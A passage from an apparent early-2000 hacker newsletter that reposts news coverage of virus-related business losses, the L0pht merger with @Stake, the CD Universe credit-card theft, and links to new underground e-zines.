CARLSBAD, Calif. (APBnews.com) -- Businesses around the world spent $12.1 billion last year in a war against "economic terrorism" in the form of malicious computer viruses, according to a new study.

Computer Economics, a computer consulting firm here, has found that the economic impact of virus attacks on information systems around the world are taking a heavy financial toll on business.

For the most part, computer security concerns have focused on hackers trying to gain entry into a company's computer system, rifling through files and possibly stealing sensitive and confidential information. But viruses, especially those delivered in e-mail, are giving corporate information technology managers something new to worry about.

Lost productivity and downtime

Samir Bhavnani, the analyst with Computer Economics who conducted the study, said the $12.1 billion is based on lost productivity, network downtime and the expense involved in getting rid of the virus.

"This form of economic terrorism is growing as viruses are no longer the minor annoyances that they were a few years ago," Bhavnani said. "Now they can verge on the catastrophic and cause major predicaments for any organization."

He said for the first six months of last year, financial losses caused by computer viruses totaled $7.6 billion.

Bhavnani said that companies must devote time to teaching their employees "prudent workstation use."

Delivery began to change

"Simple things like refraining from downloading unnecessary and non-work-related items from the Internet, opening executable files sent via e-mail or frequenting pornographic Web sites will increase the security level and reduce the vulnerability of valuable corporate resources," Bhavnani said.

A survey conducted last year by Information Security magazine asked information technology managers where they experienced the most security breaches. Seventy-seven percent said computer viruses were the No. 1 problem, followed by unauthorized access by employees and hackers and the theft and destruction of computing resources.

Last year, a series of malicious viruses clogged e-mail networks, crashed computers and erased hard drives. The way that viruses are delivered began to change. The "Bubbleboy" virus was activated when unsuspecting users opened an infected e-mail. In the past, computer viruses were spread through attachments, and e-mail was generally regarded as safe.

'High-profile damage'

With computer virus alerts coming sometimes on a daily basis, security experts say that businesses are still not taking virus prevention seriously.

"Despite all of the high-profile damage caused by viruses, organizations are still just beginning to implement adequate security plans," said Michael Erbschloe, vice president of research at Computer Economics. "Additionally, many firms are reluctant to report damages because they feel they may be identified as an easy target."

The study says that in the past three years there has been a major programming shift as viruses have become far more malicious and are designed specifically for destruction and damage. The study said that computer viruses were initially designed to create a minor annoyance. Now they are very complex and come in a multitude of forms, and many are polymorphic, which means they change while in a computer to avoid detection from anti-virus software.

Melissa and Explorer encouraged copycats

"The Melissa and Explorer.zip viruses acted as a catalyst in 1999," said Erbschloe. "Organizations started to realize the severity and the malicious intent of most new computer viruses and began to take the cries for increased security spending more seriously."

Steven Ross, a director at Deloitte & Touche's Enterprise Risk Services Practices, said computer viruses are having a noticeable impact on companies.

"The first wave of viruses 10 years ago attacked at the operating system level. The ones we see today are attacking at the application level. The filters that come into play when you boot up aren't necessarily capturing the things that are happening at the application level," said Ross.

He said there may only be a handful of smart computer writers, and that there are hundreds and thousands of so-called script kiddies who when taught to program a virus can do so without much effort.

Writers rely on 'general complacency'

"There is also a general complacency. ... They are absolutely counting on it," said Ross. He cited an example of removing 7,500 viruses from a number of servers for a company. When he returned the next week, there were 1,500 more viruses.

Dan Schrader, vice president of new technology at Trend Micro, an anti-virus software company in Silicon Valley, said the $12.1 billion figure is "conceivable," and "I am not at all surprised by that number."

"If you want to label what the year [1999] was in technology, the first label would be the year of the IPO, and the second label would be the year of the computer virus. There were more serious computer virus outbreaks in any one month of last year than we've had virtually in the entire history of computing," said Schrader.

He said there was "tremendous innovation" among computer virus writers, and for the first time the virus writers got it that it's "all about the Internet."

"There is lost data, lost productivity while you wait for the tech guy to come around, and then there's the e-mail systems being shut down," Schrader said. "One of the more common ways for companies to respond to news of a new virus outbreak is to do a pre-emptive shutdown of their e-mail system. ... It's the main way that computer viruses are spread."

David Noack is an APBnews.com staff writer (david.noack@apbnews.com)

@HWA

47.0 HNN: Jan 24: L0pht and @Stake Create Controversy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Someone gets a grant or has a merger with a commercial company and suddenly they have "SOLD OUT", become "NARQS" or the like. Pure BS. The l0pht is long overdue its break in the security field, so just chill and let them do their thang, you're just jealous you ain't got what it takes to make the grade yourself.
- Ed

From HNN http://www.hackernews.com/

contributed by Weld Pond

The recent merger of the hacker think tank L0pht Heavy Industries with security services company @Stake has created an immense buzz within the industry. Unfortunately some journalists (well one actually) don't seem to get it and have published some potentially libelous comments regarding the merger.

ZD Net
http://www.zdnet.com/pcweek/stories/news/0,4153,2420340,00.html

Other writers seem to have more legitimate concerns but it is still obvious that they have not done their research.

ZD Net
http://www.zdnet.com/pcweek/stories/columns/0,4351,2421254,00.html

And still others actually seem to understand.

Boston Herald
http://www.bostonherald.com/bostonherald/life/net01182000.htm

CNN
http://cnn.com/TRANSCRIPTS/0001/22/stc.00.html

ABC News
http://abcnews.go.com/onair/dailynews/wkn_000122_netsecurity.html

ZDNet #1;

--------------------------------------------------------------
This story was printed from PC Week,
located at http://www.zdnet.com/pcweek.
--------------------------------------------------------------

It gets really scary when hackers join security firms

By John Taschek, PC Week
January 16, 2000 9:00 PM PT
URL:

It's shaping up to be an interesting year, which in some cultures is not necessarily a good thing. First, Lotus President Jeff Papows resigns, though I'm not sure I believe anything from Papows anymore. Then Steve Jobs takes full control over at Apple, which will, of course, trigger a huge sell-off at Apple because, as everyone knows, Jobs works best when he's a front-seat driver with a back-seat title. Then China reportedly bans Windows 2000, presumably so that the country could develop an indigenous operating system based on Linux. (The Chinese government denied the report.)

But by far the oddest thing to happen is that the hackers (or, as the fundamentalist technologists say, crackers) who went by the name L0pht Heavy Industries have now become full-scale security consultants.

Does this bode ill for the nation's security, or what? Is everyone off their rocker? I can't believe what I'm reading. I also can't believe I'm writing about it, since dealing with people who have exhibited criminal tendencies is not a business I want to be in.

L0pht was a highly publicized group of hackers who started out cracking security systems and then, somewhere along the line, became somewhat legitimate because they began to document what they were doing on the L0pht.com Web site. L0pht also develops software that allows users to crack operating system passwords in a matter of hours.

To get an idea how strange it is for a security firm to hire L0pht personnel, you only need to look at the Attrition.org Web site, which highlights L0pht. Attrition's motto is, "We're easy to get along with once you learn to worship us." More damning is that L0pht has also gone on record as saying that "governments and multinational corporations are detrimental to the personal liberties on the Internet."

On the other hand, L0pht's new company, called @Stake, is a specialized professional services company that will provide a full range of security solutions for the e-commerce operations of global clients. This is clearly an example of the farmer giving the fox the key to the chicken coop.

I can't imagine that any legitimate startup would actually seek out L0pht. But that's exactly what has happened, as executives from Forrester Research, Cambridge Technology Partners and Compaq formed @Stake specifically to provide security services to its clients. Lo and behold, the vice president of R&D at @Stake is none other than Professor Mudge, the chief scientist at L0pht. I can just imagine Mudge hacking and cracking to his heart's content, simply to find weaknesses at those multinational companies, which then would become @Stake's new customers.

Of course, the tired old argument is that L0pht performs a service by detailing flaws in systems so that companies can boost their defenses against a real, and more threatening, hacker. Hogwash, poppycock and every other early-20th-century declarative.

L0pht comprised many extremely bright and talented people, and Mudge might have been the smartest of the bunch. But L0pht's history shows that the group is not ethical, maintained practices that bordered on being illegal and is simply downright scary. I wouldn't want any organization that hired the brain trust of L0pht as my security consultant.

See @Stake's response to John Taschek's column.

Is it better to join them if you can't beat them? Write me at john_taschek@zd.com.

I encourage you to DO write him and respond to this article but do so politely, expletives and leet talk will just make us look worse and prove his point. - Ed

-=-

ZDNet #2

--------------------------------------------------------------
This story was printed from PC Week,
located at http://www.zdnet.com/pcweek.
--------------------------------------------------------------

L0pht-@Stake pact: Going legit, selling out or both?

By Michael Caton, PC Week
January 16, 2000 9:00 PM PT
URL: http://www.zdnet.com/pcweek/stories/columns/0,4351,2421254,00.html

What bothers me the most about security specialist L0pht Heavy Industries becoming part of @Stake isn't the idea of hiring hackers. It's the idea that L0pht's great, free public service is now very much for hire.

The trend in the industry has been to give away, or at least subsidize with advertising, some beneficial IT resources. I can think of at least a half-dozen free IT help sites that eventually hope to make money through advertising or e-commerce. Access to security information is moving in the other direction, however, entirely because there is so much demand and so few security experts.

L0pht has been a thorn in the side of many vendors; a quick look at its Web page reveals a great tweak of Microsoft. L0pht has been known to really embarrass vendors that have not moved quickly enough to address the security holes the group finds. Access to most of the information has been free—or, according to the L0pht site, "so that system administrators, users, and software and hardware vendors may benefit from our knowledge, we share some of it with you." In the past, "some" could have meant that L0pht held information back to protect us all from the less scrupulous, but now it could be held back to help @Stake maintain a competitive advantage when consulting. Talk about unscrupulous.

What will be as interesting will be to see how this security-for-hire model plays out when it comes to companies such as @Stake maintaining a competitive advantage. By going fully legit and for-profit, this could compromise relationships with hacking sources. When a security expert or hacker finds a new exploit, is the rush going to be to share it with anyone? Not if someone else is going to make money off it or hold it as confidential information to have a competitive advantage. Perhaps image and rhetoric can maintain enough good will to keep sources alive, although I'm not so sure an anarchist's mantra will convince too many people when a company's analysts bill out in the tens of thousands of dollars per week.

In an industry where the nondisclosure agreement is as important as the business contract, I wonder just how well the hacking community will disclose security holes it finds when under contract to vendors. Let's face it: IT consulting companies aren't the only ones hiring hackers. Security skills can be as useful for product development as for product deployment. Hopefully, as @Stake contracts out to vendors, it has an escape clause that allows it to disclose security flaws after a certain number of business days, just to keep the vendors honest.
While it is possible that L0pht will survive in spirit, the @Stake Web site has all the polish of the best up-and-coming dot-com company looking to strike gold. Retaining the anti-establishment spirit would certainly keep it in the good graces of its sources.

Do you think good security info will be held hostage to profits in the future? Write me at michael_caton@zd.com.

-=-

Boston Herald;

Cutting to the chase: Hackers join forces with security firm to keep the world safe

Net Life/Stephanie Schorow

Tuesday, January 18, 2000

Which is a more revealing story? That in December a hacker calling himself Maxim broke into a server at an on-line CD store and obtained thousands of credit card numbers? Or that when Maxim posted those numbers on a Web site from which visitors could get them, one at a time, thousands reportedly did so?

Must we beware the hacker in the machine - or the hacker next door?

First, a look at the word ``hacker'' - it's not a synonym for ``criminal,'' just as not every locksmith is a burglar, as one hacker told me. A hacker cracks software codes to get into a company's network or Web page for the thrill of beating the system, not necessarily to cause mischief. But the movie ``War Games'' transformed a bit of MIT slang for a guy who likes to create computers into a term for someone who wants to destroy them.

In popular culture, the Evil Genius Hacker has joined the Mad Scientist and Megalomaniac Who Wants to Rule the World as a standard stereotype. Fox Mulder of TV's ``The X-Files'' could not chase his aliens without illegal hacking help from the so-ugly-they're-cute Lone Gunmen, Good Guy Hackers. Hackers get a total makeover into leather-coated chic in ``The Matrix.''

But such stereotypes don't hold up in real life. The most recent Def Con - the hackers' annual meet-and-defeat confab - had, according to one on-line report, ``all the corporate professionalism of a computer mainstream industry.'' Activists, calling themselves ``white hat hackers,'' have formed a group dedicated to hacking into and shutting down kiddie-porn sites.

And just two weeks ago, the famed Boston-area hacker collective - known as the LOpht - announced its merger with a start-up security company, @Stake. With founders hailing from Compaq and Forrester Research, plus $10 million in venture capital, @Stake is pure pinstripe. At LOpht, geek rules.

The news intrigued me. For years, I'd heard about LOpht's expertise, its Web postings of key security flaws in Windows-based systems, about its outlaws-in-good-standing image with the so-called black hat hacker underground, and about their gizmo- and Cheez-Its-clogged warehouse. Going by hacker handles of Mudge, Dildog and Space Rogue, they've testified on lax computer security before the U.S. Senate. They embodied Bob Dylan's phrase: ``to live outside the law, you must be honest.''

When the hacker who goes only by ``Mudge'' returned my call, his voice was more lighthearted than mysterious. For a guy who supposedly has the ability to take down the Internet in 30 minutes, he was cheerfully patient with a fumbling reporter's Hacking 101 questions.

What enticed LOpht to come in from the cold? Well, money, for one thing; ``we'd been looking around for various ways to get the LOpht to fund itself,'' said Mudge. With @Stake's pledge not to market any specific security product, take kickbacks from vendors or interfere with LOpht's continued posting of security flaws, LOpht will be able to remain the hacker's Consumer Reports, Mudge said.

LOpht's independence is invaluable to @Stake, said Ted Julian, @Stake founder and vice president of marketing: ``There's an enormous demand in the marketplace for these people.'' That's because computer security itself is transforming. As Mudge said, ``We know how to make a closed system.'' Put up a fire wall and keep people out. But with burgeoning e-commerce, systems have to remain open enough to allow consumers access to key information. Users, for example, might want to search inventories or track a delivery. Yes, Mudge asserted, ``you absolutely can'' secure such systems. You just need the right tools.

Attorney General Janet Reno's recent call for a national anti-cybercrime network underscores the need for enhanced security.

Hacking is changing, too. Once the domain of code-writing uber-nerds, it's been invaded by so-called script kiddies, young neophytes who attack with a point and click. ``The media actually encourages them,'' Mudge said, disgustedly. ``If you read about someone breaking into a high profile Web page, it's `a 16-year-old, brilliant misguided kid.' If a 16-year-old walked into a liquor store, shot the clerk to get the money, they never say, a `brilliant juvenile expert in spontaneous combustion.' ''

For me, the most telling aspect of the Maxim hack was that afterwards no one I knew - even those who blew big bucks shopping the dotcoms - seemed spooked about e-shopping. Perhaps we've accepted a certain level of e-commerce risk. Consider: thousands of traffic accidents occur daily, but we wouldn't ban driving. We just want to keep the 16-year-old drivers under control. And we want safer roads.

Which makes me glad that the LOpht is still out there.

-=-

CNN;

Science and Technology Week

Pentagon Goes Ballistic With New Defense Tests; Group of Hackers Goes Corporate; Winds of Change Stir Up New Developments in Weather

Aired January 22, 2000 - 1:30 p.m. ET

THIS IS A RUSH TRANSCRIPT. THIS COPY MAY NOT BE IN ITS FINAL FORM AND MAY BE UPDATED.

RICK LOCKRIDGE, GUEST HOST: The Pentagon goes ballistic with new defense tests, a secretive group of computer hackers goes corporate, and the winds of change stir up new developments in weather.
Those stories and more are just ahead on SCIENCE & TECHNOLOGY WEEK.

Hello and welcome. I'm Rick Lockridge in for Ann Kellan. A test of a new high-tech U.S. defense system ended in failure this past week. A prototype Interceptor, designed to knock out approaching missiles, apparently sailed right past its target. Pentagon experts think they've figured out what went wrong. But as Jamie McIntyre reports, the failure is raising questions about the whole program.

(BEGIN VIDEOTAPE)

JAMIE MCINTYRE, CNN MILITARY AFFAIRS CORRESPONDENT (voice-over): From the launch of a target missile at night in California through the launch of an Interceptor from a sunny Pacific island, Pentagon rocket scientists thought they were looking at a slam dunk. Everything was tracking perfectly. But as they counted down to an expected mid-space collision, nothing, no flash: nothing but black space. They missed.

In reconstructing the failure, Pentagon officials say they believe heat sensors the Interceptor uses to find the warm warhead failed in the crucial final six seconds. Why, they don't yet know. It was a bitter disappointment after October's successful maiden test, but the Clinton administration vowed to press on, insisting some misses were inevitable.

JOE LOCKHART, WHITE HOUSE PRESS SECRETARY: Obviously, if this were easy technology, they wouldn't have to test. They'd just go ahead and deploy.

MCINTYRE: The $100 million test was the second of 19 planned tests of a system designed to protect the United States from a limited missile attack by a rogue nation. But only one more test is planned in the spring before the Pentagon recommends whether to invest billions more for deployment of the system by 2005. Critics insist the failure is a wake-up call that the complex missile shield is not ready for primetime.

TOM COLLINA, UNION OF CONCERNED SCIENTISTS: I would say it's just another piece of evidence that's showing that you can't make a decision this summer, that the system's moving too fast.

MCINTYRE (on camera): The Pentagon, stung by criticism that it may have overstated its previous success, went to great lengths this time to explain exactly what went wrong. And while insisting it can solve the technical problems, a senior military official admitted the test schedule may be overly ambitious. Jamie McIntyre, CNN, the Pentagon.

(END VIDEOTAPE)

LOCKRIDGE: NASA made it official this week. The Mars Polar Lander is dead. The spacecraft was designed to study the Martian atmosphere and dig up soil samples. It was due to land on Mars on December 3. But just before it entered the Martian atmosphere, it stopped sending data back to Earth, and it hasn't been heard from since. One final attempt to contact it this past week met with silence. Scientists say the Polar Lander may have burned up as it descended, or it may have crashed on Mars, but they'll probably never know for sure. Two panels investigating the failure are due to report in March.

Coming up later in the show: dolphins stranded in the shallows, and the rescue effort that helped turn things around. But first, some underground computer hackers surface to show what's at stake when you're online.

(COMMERCIAL BREAK)

LOCKRIDGE: A mysterious hacker group that's legendary in some Internet circles is going mainstream. The Boston-based group, called Lopht, is starting a company to advise big business on computer security. Our reporter Ann Kellan has known members of Lopht for two years now, and wonders if the new corporate ties will change their lofty goals.

(BEGIN VIDEOTAPE)

"MUDGE", LOPHT MEMBER: We decided Lopht is now going to completely sellout, and we are going to join the mainstream.

ANN KELLAN, CNN CORRESPONDENT: He gives keynote speeches to packed houses...

"MUDGE": If you're looking for computer security, then the Internet is not the place to be.

KELLAN: ... is invited, along with fellow group members, to testify before the U.S. Senate. He's a trained musician, and plays a mean guitar. He goes by the handle "Mudge," won't reveal his name, rank or Social Security number...

"MUDGE": I don't have to worry about, you know, who's waiting outside of my house when I leave in the morning.

KELLAN: ... and has been a member of a band of computer hackers called Lopht since 1992.

UNIDENTIFIED MALE: Seven people, close quarters, on top of each other -- it's amazing that we can actually get along without being at each others' throats.

KELLAN: Headquartered in a secret warehouse near Boston, the Lopht is filled with hand-me-down equipment. Even the bathroom is wired.

"WELD POND," LOPHT MEMBER: Here's our bathroom. Normally, a bathroom wouldn't be very exciting, but our bathroom has a Web browser.

KELLAN: There are processors and networks, from Novell to Microsoft.

UNIDENTIFIED MALE: We got it from dumpsters. We got it as, you know, people give equipment to us.

KELLAN: And once they own it, they legally attack it, learning how each system works, inside and out.

"WELD POND": We don't just attack Microsoft, no matter what, you know, Microsoft might say.

KELLAN: Each member has an area of expertise. "Weld Pond," programmer and Web guru. "Brian Oblivion" knows networks. "Silicosis (ph)" deciphers network codes. "Space Rogue" knows the inner workings of Macintosh computers. He also publishes a daily hacker newsletter on the Web.

"SPACE ROGUE," LOPHT MEMBER: There are a lot of things that go on that affect the hacker culture and the people that are in the hacker community that don't really get reported in the mainstream.

KELLAN: "Kingpin" is a hardware expert, started hacking when he was 7, not always legally. He says Lopht helped set him straight.

"KINGPIN," LOPHT MEMBER: I got into trouble for some things when I was younger, and they basically took me under their wing. They must have thought I had some good in me.

UNIDENTIFIED MALE: Still do; we're just still trying to find it.

KELLAN: "Dill Dog" is an ace programmer. Before joining Lopht, he made headlines in another hacker group, developing software that lets people access computers from remote locations, for good or for bad. It ticked off the likes of Microsoft, but if a system is vulnerable, Lopht's philosophy is to go public with it.

"MUDGE": If you don't bring it public and if you just hand information off to the offending company, they just want to bury it, because it's cheaper for them to do that.

KELLAN: Considered by many the consumer advocates of the computer world.

"KINGPIN": We know the computer industry is here to stay, and we want to make security better. We want to make the industry better.

KELLAN: In the hacker world, blue hairs mingle with crew cuts and criminals with feds, the cops and robbers attend the same conventions, to learn from each other -- where computer vulnerabilities are, where thieves can break in and steal everything, from bank accounts to medical records.

KELLAN (on camera): How vulnerable are all the systems out there?

(LAUGHTER)

UNIDENTIFIED MALE: Toys can be hacked.

KELLAN (voice-over): The Lopht has been an exclusive hacker playground. And now this band of hackers is going corporate, moving to white-walled offices, getting money to buy new equipment, a place where they can do more good, says "Mudge." As far as their old stomping grounds...

"MUDGE": The luxurious labs will still exist there for sometime, I'm sure, but...

UNIDENTIFIED MALE: We still can't tell you where it is.

"MUDGE": Even the Lopht folks are sitting there going, we love this place, but boy, we can make something so much better.

KELLAN: The move is good, and he'll stay casual and keep his personal life private, he says. But will success change Lopht's goals?

UNIDENTIFIED MALE: One thing we always said about Lopht, if it stops being fun, then it's not Lopht, then it's work.

"KINGPIN": It's just so wonderful to figure out how the world works around you, and especially when it doesn't.
UNIDENTIFIED MALE: It is a family, that's what it is.

KELLAN: For SCIENCE & TECHNOLOGY WEEK, this is Ann Kellan.

(END VIDEOTAPE)

LOCKRIDGE: The Lopht members say their security expertise is particularly needed in the field of e-commerce. They see a conflict there between protecting data and the need to make Web sites very easy and welcoming for cyber-shoppers. But, says one of their new corporate partners, "If you can't do security right, you can't do e-commerce right." "Mudge" agrees, and says security should no longer be just walls built to keep people out, but an element that makes everyone's job easier, from the warehouse to the delivery company to the customer.

Coming up: from climate patterns to better weather detection, we'll tell you what's making waves.

(COMMERCIAL BREAK)

LOCKRIDGE: Some climate researchers think there's a big change going on in the Pacific Ocean that could bring weird weather for the next 30 years. They say unusual areas of warm and cold water may mean we're entering a pattern called the Pacific Decadal Oscillation, which changes weather around the world. Anne McDermott has more.

(BEGIN VIDEOTAPE)

ANNE MCDERMOTT, CNN CORRESPONDENT (voice-over): Painting the lawn: another wacky California custom? Well, no. This was back in the late '80s, when a drought burned up all the grass. Eventually, though, the vegetable dye was washed away by El Nino. But it may be time to get out that green dye again, because according to the experts, more drought is on the way. And that's because of a natural recurring climate pattern over the Pacific Ocean called Pacific Decadal Oscillation, or PDO for short. Unlike El Nino, which only sticks around a year or two, PDO is a much bigger phenomenon, and one that waxes and wanes over the course of 20 to 30 years. Scientists monitoring this PDO say it steers the jet stream over North America and will result, they say, in lots more rain in the northwestern part of the United States and less than normal rainfall in the southern part of the country.

WILLIAM PATZERT, JPL OCEANOGRAPHER: When the Pacific speaks with events like this, Pacific Decadal Oscillation, the United States definitely listens.

MCDERMOTT: How severe droughts will be is by no means possible to determine, but expect a renewed interest in those low-flow showerheads and those water-skimping toilets. No one's forgotten rationing or the sacrifices.

UNIDENTIFIED MALE: Not being able to wash down my driveway and wash my car.

MCDERMOTT: Now, this PDO is not related to global warming, but its reach may be global. Scientists say it's possible that the PDO played a part in the terrible flooding in Venezuela last year and in those wind storms that battered Europe late last month. But mostly, this climate pattern will affect the U.S. In fact, it's already happening. Scientists say New England's long wait for that first big snow is related to the PDO. Next up: well, at least some periods of drought in some parts of the country, though it's unlikely it'll make anyone yearn for the return of El Nino. For SCIENCE & TECHNOLOGY WEEK, I'm Anne McDermott, CNN, Los Angeles.

(END VIDEOTAPE)

LOCKRIDGE: If we're going to have strange weather in the next few years, at least forecasters may be able to give us a bit more warning of what's coming. The National Weather Service has a brand new computer, and officials say it will make predictions faster and more accurate. Natalie Pawelski reports.

(BEGIN VIDEOTAPE)

NATALIE PAWELSKI, CNN CORRESPONDENT (voice-over): Predicting this week's snowstorms and bitter cold and forecasting the hurricanes and tornadoes of warmer months has just gotten easier, says the National Weather Service, thanks to a new supercomputer.

JACK KELLY, NATIONAL WEATHER SERVICE: We're starting off today with a much -- a five-times-faster computer than we've had, and by September, it will be about 28 times faster than the one we currently have. So we're able to do better simulations of the atmosphere.

PAWELSKI: The Weather Service says the new computer will give people more lead time to prepare for severe storms, and it's designed to run increasingly complex forecasting models that predict what's coming with ever-greater detail.

KELLY: What's that mean for everyone? It means more accurate forecasts, longer-time forecasts and more accurate, both temperature, rain, you name it; it's going to be better than what we've been able to do.

PAWELSKI: They say everybody talks about the weather but nobody does anything about it. The new computer should allow people to talk about coming weather further in advance. And while we still can't do anything about it, at least we can be better prepared. For SCIENCE & TECHNOLOGY WEEK, I'm Natalie Pawelski.

(END VIDEOTAPE)

LOCKRIDGE: Coming up next: surfing the Web and the water. We'll travel to Florida for a marine mammal mystery, then introduce you to an older generation learning some new technology.

(COMMERCIAL BREAK)

LOCKRIDGE: Skywatchers with clear weather got a spectacular show on Thursday night. A total lunar eclipse made the full moon glow an eerie shade of red over North and South America. This was the first time in four years that the Sun, Earth and Moon lined up just right to produce this kind of show. It happens when the Earth's shadow blocks most of the Sun's rays from lighting up the Moon. The next full lunar eclipse will be in July, and the best viewing for that one will be from Asia and Australia.

Marine biologists in the Florida Keys are trying to solve a mystery. Starting last weekend, dozens of bottle-nosed dolphins began stranding themselves on tidal flats.
They included both healthy and sick animals, and scientists are trying to figure out just what drove them so close to shore. Reporter Mike Tobin, from our affiliate WSVN, has the story.

(BEGIN VIDEOTAPE)

MIKE TOBIN, WSVN REPORTER: Hours and hours of desperate, exhaustive labor got rescuers to the point where they finally chased the dolphin out into open water.

CHRIS BLANKENSHIP, MARINE BIOLOGIST: It's nice to see him go offshore, but whether they get stranded again, we don't know.

TOBIN: Without warning, dolphins started coming ashore, not just on Long Key, but on the west coast of Florida. These dolphins ran aground at Aresnicker (ph) Bank, about five miles off Long Key. So necropsies are being performed on all the dolphin that died to see if there was an illness or toxin which caused this.

BRAD LANGE, LAYTON, FLORIDA FIRE DEPARTMENT: Something's obviously going on. Right now, we're checking dolphins out, and hopefully we'll know more later on.

TOBIN: There were two efforts going on in the water, one to nurse the ill, exhausted or injured back into swimming shape, and two, to scare the healthy dolphin into the open sea, but the first attempts at human chains were unsuccessful. The healthy dolphin kept coming back. Then someone came up with a theory that this was a tightly knit pod of dolphin, and the sick ones were calling for help.

BLANKENSHIP: Sometimes animals will, when they congregate together as a family, if you get a couple of sick ones, and they have this feeling of responsibility, at least in my mind, you know, they have to take care of the animals that are sick.

TOBIN: So they moved the sick ones to a tank onshore, where they couldn't communicate with the other dolphin. Sadly, one of those died when it was moved.

DENISE JACKSON, WILDLIFE RESCUE: We have had scenarios that once the injured and the sick ones died, the healthy ones did leave.

TOBIN: Then the volunteers formed a human chain again, this time with kayakers in front. With buckets of fish on their legs, they would try to act like the Pied Piper, tempting the dolphin out to sea. With all the people behind them scaring the dolphin, the survivors made it to the open water, where they can't be injured or trapped by the sharp coral in the shallow water of the Keys.

LANGE: We consider this a great success because there could have been a lot of them expired.

(END VIDEOTAPE)

LOCKRIDGE: That report from Mike Tobin, of our affiliate WSVN.

When you imagine a typical Internet user, you might think of a teenager endlessly chatting with friends, or a young business tycoon checking stock prices on a Palm Pilot. But the Internet's not just for the young. As Don Knapp reports, it's keeping some senior citizens young at heart.

(BEGIN VIDEOTAPE)

DAVID LANSDALE, GERIATRICS EXPERT: So let's go down one more, push your enter key.

DON KNAPP, CNN CORRESPONDENT (voice-over): David Lansdale's found a way to spark up the lives of the elderly. He gets them wired to the Internet.

LANSDALE: Now one more. Now type "au."

UNIDENTIFIED FEMALE: I thought maybe I was through with life, I was ready for a rocking chair because I was 86 years old, and I haven't found the rocking chair yet.

KNAPP: The average age of Lansdale's students is around 68. All are in nursing or assisted care homes. He used family relationships to introduce them to the Web.

LANSDALE: Here they are in California, a family was back in New York. The opportunity for them to connect, to cross that time and space, was an incredibly precious opportunity to them.

UNIDENTIFIED FEMALE: I hear you are so beautiful.

KNAPP: Lillian Sher (ph) dictates an e-mail to a newborn great-granddaughter. Working with one another, the seniors learn as a group, to both master the Internet and overcome what Lansdale calls the maladies of the institutionalized: loneliness, helplessness, boredom and cognitive decline.

MARY HARVEY, WEB SURFER: Bingo just doesn't appeal to me, but this does. Believe me, this does.

(LAUGHTER)

KNAPP: Ninety-four-year-old Ruth Hyman is a star pupil and an instructor.

RUTH HYMAN, INTERNET INSTRUCTOR: When I sent a letter to my grandchildren and great-grandchildren, they hung it up in their offices, just like I used to hang their drawings on my refrigerator.

LANSDALE: There's a collective benefit, there is an element of -- a tremendous element of therapy. And remember that we started as a support group.

DIXON MOOREHOUSE, WEB SURFER: I just wish I was 15 years old and getting to learn all this.

LANSDALE: The seniors call their weekly meetings Monday Night Live, and many say it's given them new life.

HYMAN: Three years ago they told me I wasn't going to live, but I showed them. I got on the Web and got work, and I've worked ever since.

KNAPP: For SCIENCE & TECHNOLOGY WEEK, I'm Don Knapp.

(END VIDEOTAPE)

LOCKRIDGE: Thanks for joining us. I'm Rick Lockridge, in for Ann Kellan. Next week: technology evolution and how it affects you. The digital age has produced lots of new businesses and is threatening to kill off some old ones. It's survival of the fittest, where the losers become techno-saurs. That's coming up on the next SCIENCE AND TECHNOLOGY WEEK. We'll see you then.

TO ORDER A VIDEO OF THIS TRANSCRIPT, PLEASE CALL 800-CNN-NEWS OR USE OUR SECURE ONLINE ORDER FORM LOCATED AT www.fdch.com

-=-

ABC News; By Bill Redeker

Jan. 22 — Computer crime is on the rise. And as more people start purchasing online, entrusting their credit card numbers and other personal details to the ether, many experts say it is time to step up the battle for online security.

“You don’t even have to be a really knowledgeable intruder, you can just use one of these tools that are out there and break into a system,” says Kathy Fithin of the Computer Emergency Response Team at Carnegie Mellon University in Pittsburgh. Last year the Response Team received reports of more than 8,000 Internet attacks and intrusions.
Connecticut-based CD Universe reported it received a fax from a hacker describing himself as a 19-year-old from Russia. The hacker offered to destroy the credit card files he had accessed through a flaw in the software for $100,000. When CD Universe passed up the offer, the hacker retaliated by posting up to 25,000 numbers on a Web site called Maxus Credit Card Pipeline.

Card Numbers Cause Alarm

“What’s interesting about this case is the sheer scale of the crime. The person claims to have 300,000 credit cards, which is an enormous amount,” says security expert Elias Levy.

Discover Financial Services, Visa, MasterCard and American Express are all working to get new cards to the customers compromised by the Russian hacker.

The Maxus incident is bound to reignite consumer concern over online security. At least 30 businesses are compromised every day, according to ABCNEWS research. The problem has led to a boom in computer security firms.

@Stake, a security firm in Boston, went to the source and hired eight of the most prominent hackers in the country, a group called L0pht Heavy Industries. The L0pht crew consider themselves “gray-hat” hackers. Unlike black-hat hackers such as Maxus and white-hat vigilante hackers who sabotage kiddie-porn sites, L0pht identifies security flaws publicly then dares companies to fix them.

Several L0pht members have testified in Congress about online security. They’ll be helping @Stake design systems that even they can’t penetrate.

“I think we really understand how people break into computer systems because we do it ourselves,” said Weld Pond, a L0pht member.

Hackers vs. hackers: it may be the face of the future.
@HWA

48.0 HNN: Jan 24: Several New Ezine Issues Available
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I really hoped to review at least one of these for this issue, but the sites are so damn slow or overcrowded I couldn't reach them, so hopefully next issue I'll have some snippets/a review for you - Ed

From HNN http://www.hackernews.com/

contributed by Armour, The Hex, and others

New editions of several underground e-zines have been released. InET from Columbia in both English and Spanish, Issue #1 of Hack in the Box, Quadcon #3 from Australia and DataZine 0.01 from the folks at Datacore have hit the streets. Get your copies now!

InET
http://www.warpedreality.com/inet

Hack In the Box
http://www.thelimit.net/hitb

Quadcon
http://landfill.bit-net.com/~quadcon/quadcon-3.txt

DataZine
http://www.tdcore.com

If anyone else manages to get through and wants to write a review on these (or any other zine, even if it's your own *G*), go ahead and email it in and I'll post it in the zine. - Ed

Here's a taste of Quadcon by Amour from Australia (Issue #1)

****************************************************************************
***************************<-=- QuadCon -=->********************************
****************************************************************************
*************The Newest Zine To Hit Australia And The World*****************
*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/
*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/

============================================================================
December 1999 - Issue 1
============================================================================

What's In This Issue:

# Halcon Hacker Valiant Gives QuadCon An Exclusive Interview And Some Special Tips In Trying To Prevent Your Machine From Being Hacked

